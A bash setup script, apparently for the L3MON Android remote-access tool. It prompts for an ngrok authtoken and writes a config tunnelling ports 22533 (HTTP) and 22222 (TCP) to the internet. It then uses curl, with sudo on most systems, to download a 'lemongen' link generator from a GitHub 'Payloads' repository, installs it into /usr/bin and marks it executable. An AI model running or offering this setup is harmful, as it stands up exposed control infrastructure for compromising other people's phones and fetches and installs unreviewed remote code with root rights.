#!/bin/bash
Black='\033[0;30m'
Red='\033[0;31m'
Green='\033[0;32m'
IGreen='\033[0;92m'
Yellow='\033[0;33m'
IYellow='\033[0;93m'
Blue='\033[0;34m'
Purple='\033[0;35m'
Cyan='\033[0;36m'
White='\033[0;37m'
clear='\033[0m'

linkss(){
if [[ -e /data/data/com.termux/files/usr/bin/ls ]]
then
  #termux
curl -L -o /data/data/com.termux/files/usr/bin/lemongen https://raw.githubusercontent.com/efxtv/Payloads/main/Demo/server/l3mon-link -s;chmod +x /data/data/com.termux/files/usr/bin/lemongen
else
#Other's
sudo curl -L -o /usr/bin/lemongen https://raw.githubusercontent.com/efxtv/Payloads/main/Demo/server/l3mon-link -s;sudo chmod +x /usr/bin/lemongen

#https://raw.githubusercontent.com/efxtv/Payloads/main/Demo/server/l3mon-link
fi
}

ngrcheck(){
if [[ -e $HOME/ngrok ]]
then
echo -e " ${Green}[${IGreen}✔${clear}${Green}] ${IYellow}Ngrok installed${clear}"
else
echo -e " ${Green}[${IGreen}✔${clear}${Green}] ${Red}Please install ngrok...${clear}"
exit 1
fi 
}
ngrokver(){

ngrov=$($HOME/ngrok --version|awk '{print $NF}')
echo -e " ${Green}[${IGreen}✔${clear}${Green}] ${IYellow}Ngrok version found${White} $ngrov ${clear}"
}


ngrcheck
sleep 1
ngrokver
if [[ -e $HOME/.ngrok2/ngrok.yml ]]
then
echo -e " ${Green}[${IGreen}✔${clear}${Green}] ${IYellow}Ngrok Auth found${clear}"
echo -en " ${Green}${IGreen} ▷ ${clear}${Green} ${IYellow}Enter Authtoken: ${Blue}"
read ett
echo "version: \"2\"
authtoken: $ett
tunnels:
 lemon:
  addr: 0.0.0.0:22533
  proto: http
 lemon2:
  addr: 0.0.0.0:22222
  proto: tcp

" > $HOME/.ngrok2/ngrok.yml
echo -en " ${Green}${IGreen} ▷ ${clear}${Green} ${IYellow}Type lemongen to use the L3MON Link Gen ${clear}"
else
echo -en " ${Green}${IGreen} ▷ ${clear}${Green} ${IYellow}Enter Authtoken (config): ${Blue}"
read ett
echo "version: \"2\"
authtoken: $ett
tunnels:
 lemon:
  addr: 0.0.0.0:22533
  proto: http
 lemon2:
  addr: 0.0.0.0:22222
  proto: tcp

" > $HOME/.config/ngrok/ngrok.yml
echo -en " ${Green}${IGreen} ▷ ${clear}${Green} ${IYellow}Type lemongen to use the L3MON Link Gen ${clear}"
fi 
linkss


